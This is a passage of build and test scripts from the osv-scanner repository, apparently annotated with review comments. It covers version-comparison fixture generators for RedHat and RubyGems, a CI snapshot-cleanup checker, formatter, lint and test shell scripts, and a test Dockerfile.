redhat_comparer.compare(self.version, '>', other.version) def __eq__(self, other): return redhat_comparer.compare(self.version, '=', other.version) def compare(v1, relate, v2): ops = {'<': operator.lt, '=': operator.eq, '>': operator.gt} return ops[relate](v1, v2) def compare_versions(lines, select='all'): has_any_failed = False for line in lines: line = line.strip() if line == '' or line.startswith('#') or line.startswith('//'): maybe_unsupported = uncomment(line).strip() if is_unsupported_comparison(maybe_unsupported): print(f'\033[96mS\033[0m: \033[93m{maybe_unsupported}\033[0m') continue v1, op, v2 = line.strip().split(' ') r = compare(RedHatVersion(v1), op, RedHatVersion(v2)) if not r: has_any_failed = r if select == 'failures' and r: continue if select == 'successes' and not r: continue color = '\033[92m' if r else '\033[91m' rs = 'T' if r else 'F' print(f'{color}{rs}\033[0m: \033[93m{line}\033[0m') return has_any_failed def compare_versions_in_file(filepath, select='all'): with open(filepath) as f: lines = f.readlines() return compare_versions(lines, select) def generate_version_compares(versions): comparisons = [] for i, version in enumerate(versions): if i == 0: continue comparison = f'{versions[i - 1]} < {version}\n' if is_unsupported_comparison(comparison.strip()): comparison = '# ' + comparison comparisons.append(comparison) return comparisons def generate_package_compares(packages): comparisons = [] for package in packages: versions = packages[package] comparisons.extend(generate_version_compares(versions)) # return comparisons return list(dict.fromkeys(comparisons)) def fetch_packages_versions(): download_redhat_db() osvs = [] with zipfile.ZipFile('redhat-db.zip') as db: for fname in db.namelist(): with db.open(fname) as osv: osvs.append(json.loads(osv.read().decode('utf-8'))) return extract_packages_with_versions(osvs) outfile = 'internal/semantic/testdata/redhat-versions-generated.txt' packs = fetch_packages_versions() with open(outfile, 'w') as f: 
f.writelines(generate_package_compares(packs)) f.write('\n') # set this to either "failures" or "successes" to only have those comparison results # printed; setting it to anything else will have all comparison results printed show = os.environ.get('VERSION_GENERATOR_PRINT', 'failures') did_any_fail = compare_versions_in_file(outfile, show) if did_any_fail: sys.exit(1)

================================================
FILE: scripts/generators/generate-rubygems-versions.rb
================================================
#!/usr/bin/env ruby

require "rubygems/version"
require "open-uri"
require "json"
require "zip"

# An array of version comparisons that are known to be unsupported and so
# should be commented out in the generated fixture.
#
# Generally this is because the native implementation has a suspected bug
# that causes the comparison to return incorrect results, and so supporting
# such comparisons in the detector would in fact be wrong.
#
# @type [Array]
UNSUPPORTED_COMPARISONS = [].freeze

# Reports whether the given comparison line is listed in UNSUPPORTED_COMPARISONS.
#
# @param [String] line
# @return [Boolean]
def is_unsupported_comparison?(line)
  UNSUPPORTED_COMPARISONS.include? line
end

# Strips the first comment marker from a line.
#
# The pattern is an alternation of `^#` and `//`, so only the `#` branch is
# anchored to the start of the line; `//` matches wherever it first occurs.
#
# @param [String] line
# @return [String]
def uncomment(line)
  line.sub(%r{^#|//}, "")
end

# Downloads the RubyGems advisory archive over HTTPS from a fixed URL and
# writes it to "rubygems-db.zip" in the current working directory.
#
# The response body is read into memory in one go; no size limit or checksum
# is applied to the download in this function.
def download_rubygems_db
  URI.open("https://osv-vulnerabilities.storage.googleapis.com/RubyGems/all.zip") do |zip|
    File.binwrite("rubygems-db.zip", zip.read)
  end
end

# Collects, per package name, the versions listed in the "affected" entries
# whose ecosystem is "RubyGems".
#
# Every record is indexed with osv["affected"] without a fallback, so each one
# is expected to carry that key. Each version string is passed to
# Gem::Version.new; the resulting lists are de-duplicated and sorted.
#
# @param [Array] osvs parsed advisory records
# @return [Hash] package name => sorted array of Gem::Version
def extract_packages_with_versions(osvs)
  packages = {}

  osvs.each do |osv|
    osv["affected"].each do |affected|
      next unless affected.dig("package", "ecosystem") == "RubyGems"

      package = affected["package"]["name"]

      packages[package] ||= []
      affected.fetch("versions", []).each do |version|
        packages[package] << Gem::Version.new(version)
      end
    end
  end

  packages.transform_values { |v| v.uniq.sort }
end

# Evaluates "v1 op v2" using Gem::Version, treating "=" as "==".
#
# `op` is used directly as a method name via `method(op)`. The generator in
# this file only ever writes "<" and "=" (see generate_version_compares), but
# compare_versions takes `op` from the second field of each fixture line
# without checking it against that set.
# NOTE(review): consider rejecting any operator outside a fixed list before
# the lookup, so an edited fixture line cannot select an arbitrary method.
def compare_version(v1, op, v2)
  op = "==" if op == "="

  Gem::Version.new(v1).method(op).call(Gem::Version.new(v2))
end

# Runs every comparison line and prints a coloured T/F result per line.
#
# Empty lines and lines starting with "#" or "//" are not evaluated; if the
# uncommented text is a known unsupported comparison it is printed with an
# "S" marker. Other lines are split on whitespace and the first three fields
# are used as v1, op and v2.
#
# @param [Array] lines
# @param [Symbol] select :failures or :successes to print only those results;
#   any other value prints all of them
# @return [Boolean] true if at least one comparison was not truthy
def compare_versions(lines, select = :all)
  has_any_failed = false

  lines.each do |line|
    line = line.strip

    if line.empty? || line.start_with?("#") || line.start_with?("//")
      maybe_unsupported = uncomment(line).strip

      puts "\033[96mS\033[0m: \033[93m#{maybe_unsupported}\033[0m" if is_unsupported_comparison?(maybe_unsupported)

      next
    end

    parts = line.split
    v1 = parts[0]
    op = parts[1]
    v2 = parts[2]

    r = compare_version(v1, op, v2)

    # the failure flag is recorded before filtering, so `select` only affects output
    has_any_failed = true unless r

    next if select == :failures && r == true
    next if select == :successes && r != true

    color = r ? "\033[92m" : "\033[91m"
    rs = r ? "T" : "F"
    puts "#{color}#{rs}\033[0m: \033[93m#{line}\033[0m"
  end

  has_any_failed
end

# Reads the fixture at `filepath` and runs compare_versions over its lines.
def compare_versions_in_file(filepath, select = :all)
  compare_versions(File.readlines(filepath), select)
end

# Builds "previous op current" lines for each adjacent pair of versions,
# using "=" when the two are equal and "<" otherwise. Lines that are known to
# be unsupported are emitted commented out with a leading "# ".
def generate_version_compares(versions)
  comparisons = []

  versions.each_with_index do |version, i|
    next if i == 0

    op = "<"
    op = "=" if versions[i - 1] == version

    comparison = "#{versions[i - 1]} #{op} #{version}"
    comparison = "# #{comparison}" if is_unsupported_comparison?(comparison)

    comparisons << comparison
  end

  comparisons
end

# Concatenates the comparison lines of every package into one array.
def generate_package_compares(packages)
  comparisons = []

  packages.each_value { |versions| comparisons.concat(generate_version_compares(versions)) }

  comparisons
end

# Downloads the advisory archive, parses every entry as JSON and returns the
# package => versions map.
#
# Zip::File.open is called without a block and nothing here closes the
# archive explicitly. Each entry is read in full and handed to JSON.parse with
# no cap on its decompressed size.
# NOTE(review): the archive comes from the network; a per-entry size limit
# would bound memory use if the upstream file were ever unexpectedly large.
def fetch_packages_versions
  download_rubygems_db

  osvs = Zip::File.open("rubygems-db.zip").map { |f| JSON.parse(f.get_input_stream.read) }

  extract_packages_with_versions(osvs)
end

# Path is relative, so the script writes into whatever directory it is run from.
outfile = "internal/semantic/testdata/rubygems-versions-generated.txt"

packs = fetch_packages_versions

File.write(outfile, "#{generate_package_compares(packs).uniq.join("\n")}\n")

# set this to either "failures" or "successes" to only have those comparison results
# printed; setting it to anything else will have all comparison results printed
show = ENV.fetch("VERSION_GENERATOR_PRINT", :failures).to_sym

did_any_fail = compare_versions_in_file(outfile, show)

# a non-zero exit status signals that at least one generated comparison did not hold
exit(1) if did_any_fail

================================================
FILE: scripts/report_uncleaned_snapshots.py
================================================
#!/usr/bin/env python

import os
import glob


# Prints an `::error` line for `file` when the CI environment variable is set;
# does nothing otherwise.
#
# NOTE(review): GitHub's documented workflow-command form is
# `::error file=<path>::<message>`. This line has no second `::` and passes the
# text as `msg=`, so confirm the runner really turns it into an annotation.
# If it is switched to the documented form, `file` and `msg` should be escaped
# first (%, CR and LF; also ':' and ',' in the file property), because the path
# comes from names found in the checked-out tree.
def annotate_file(file, msg):
  if os.getenv('CI') is not None:
    print(f'::error file={file} msg={msg}')


# Returns True when `<pkg_dir>/testmain_test.go` exists and some line contains
# the literal text ' testutility.CleanSnapshots(m)' (including the leading
# space); returns False when no line matches or the file is missing.
#
# This is a plain substring match, so a commented-out call would also count.
def does_clean_snapshots(pkg_dir):
  try:
    with open(f'{pkg_dir}/testmain_test.go', 'r') as file:
      for _, line in enumerate(file):
        if ' testutility.CleanSnapshots(m)' in line:
          return True
      return False
  except FileNotFoundError:
    return False


# Reports a package that has snapshots but does not clean them up.
#
# If `testmain_test.go` exists the message points at it; otherwise the first
# `*_test.go` file in the directory is used, falling back to the directory
# itself when there is none.
def report_lack_of_snapshot_cleaning(directory):
  if os.path.exists(f'{directory}/testmain_test.go'):
    file = f'{directory}/testmain_test.go'
    annotate_file(file, 'Make sure that `TestMain` is calling `testutility.CleanSnapshots(m)` after the tests have been run')
    print(f'{file} is not calling `testutility.CleanSnapshots(m)`')
  else:
    try:
      file = list(glob.iglob(os.path.join(directory, '*_test.go')))[0]
    except IndexError:
      file = directory
    annotate_file(file, 'Please add a `testmain_test.go` file with a `TestMain` function that calls `testutility.CleanSnapshots(m)` after the tests have been run')
    print(f'{directory} does not have a `testmain_test.go` file with a `TestMain` function that calls `testutility.CleanSnapshots(m)` after the tests have been run')
  pass


uncleaned_snapshots = False

# The glob is relative, so the search starts from the current working directory.
for snapshot_dir in glob.iglob('**/__snapshots__/', recursive=True):
  # drop the trailing separator so dirname() yields the package directory
  parent_dir = os.path.dirname(snapshot_dir[:-1])

  if does_clean_snapshots(parent_dir):
    continue

  report_lack_of_snapshot_cleaning(parent_dir)
  uncleaned_snapshots = True

if uncleaned_snapshots:
  print('')
  print("one or more packages are using snapshots but not ensuring they're cleaned up")
  print('make sure these packages have a testmain_test.go file that defines a TestMain function that calls testutility.CleanSnapshots(m)')
  exit(1)

================================================
FILE: scripts/run_formatters.sh
================================================
#!/usr/bin/env bash

set -ex

# NOTE(review): `prettier@latest` is resolved from the npm registry on every
# run, so the code executed here (on developer machines and in CI) is whatever
# release is newest at that moment. Pinning an exact version would make runs
# reproducible and keep a newly published release from running unreviewed.

# use write unless we're in CI, since Prettier should always be safe to apply
if [ -z "$CI" ]; then
  npx prettier@latest --write .
else
  npx prettier@latest --check .
fi

================================================
FILE: scripts/run_lints.sh
================================================
#!/usr/bin/env bash

set -ex

# Use go1.26.1 unless the caller has already chosen a toolchain.
export GOTOOLCHAIN="${GOTOOLCHAIN:-go1.26.1}"

# The linter version is read from .golangci-lint-version. The command
# substitution is unquoted, so the file is expected to hold a single token
# with no spaces or glob characters.
go run github.com/golangci/golangci-lint/v2/cmd/golangci-lint@$(cat .golangci-lint-version) run ./... "$@"

================================================
FILE: scripts/run_local_docs.sh
================================================
#!/usr/bin/env bash

set -ex

# Builds the docs image and serves it on port 4000.
# With no host address in `-p 4000:4000`, Docker publishes the port on all
# host interfaces; `-p 127.0.0.1:4000:4000` would keep it local-only.
docker build -t osv-scanner-docs -f ./docs/docs.Dockerfile ./docs
docker run -p 4000:4000 osv-scanner-docs

================================================
FILE: scripts/run_tests.sh
================================================
#!/usr/bin/env bash

set -e

if [ "$TEST_ACCEPTANCE" = true ]; then
  scripts/build_test_images.sh
fi

if [ "$DOCKER_TEST" = true ]; then
  echo "Building test image..."
  docker build -f scripts/test_env.dockerfile -t osv-scanner-test .

  echo "Running tests in container..."
  # Network host is important to fix DNS resolution issues
  # Docker socket is exposed to access other docker commands for osv-scanner container scanning
  # alpinegomodcache is a named volume to cache go module downloads between runs
  # -it allows Ctrl-C commands to cancel a test
  #
  # NOTE(review): mounting /var/run/docker.sock lets anything running in this
  # container drive the host's Docker daemon, which is equivalent to root on
  # the host. Combined with --network host and the read-write bind mount of
  # the working tree, the container is a convenience wrapper rather than an
  # isolation boundary, so run it only against checkouts you trust.
  #
  # DOCKER_TEST and CI are not among the forwarded variables, so the script
  # re-invoked inside the container falls through to the `go run gotestsum`
  # branch below (the visible part of test_env.dockerfile sets neither).
  docker run --rm -it \
    --network host \
    -v "$(pwd):/src" \
    -v "/var/run/docker.sock:/var/run/docker.sock" \
    -v "alpinegomodcache:/go/pkg/mod" \
    -e TEST_ACCEPTANCE="$TEST_ACCEPTANCE" \
    -e UPDATE_SNAPS="$UPDATE_SNAPS" \
    -e TEST_VCR_MODE="$TEST_VCR_MODE" \
    osv-scanner-test \
    sh -c "git config --global --add safe.directory /src && ./scripts/run_tests.sh \"\$@\"" -- "$@"
  # propagate the container's exit status to the caller
  exit $?
fi

# If running in CI, test with coverage
if [ -n "$CI" ]; then
  go test ./... -coverpkg=./... -coverprofile coverage.out "$@"
else
  # Use gotestsum which has a nicer test output
  go run gotest.tools/gotestsum@v1.13.0 ./... "$@"
fi

================================================
FILE: scripts/test_env.dockerfile
================================================
# The base image is referenced by tag and sha256 digest, so the content that
# is pulled cannot change unless this line is edited.
FROM golang:1.26.1-alpine3.23@sha256:2389ebfa5b7f43eeafbd6be0c3700cc46690ef842ad962f6c5bd6be49ed82039

# The apk packages are not version-pinned, so their versions follow the Alpine
# repositories at build time. docker-cli is installed for use with the Docker
# socket that run_tests.sh mounts into the container.
# NOTE(review): no USER instruction is visible here, so the tests presumably
# run as the image's default user - confirm whether that is root.
RUN apk --no-cache add \
    npm \
    maven \
    docker-cli \
    git \
    build-base \
    bash \
    rust \
    cargo

WORKDIR /src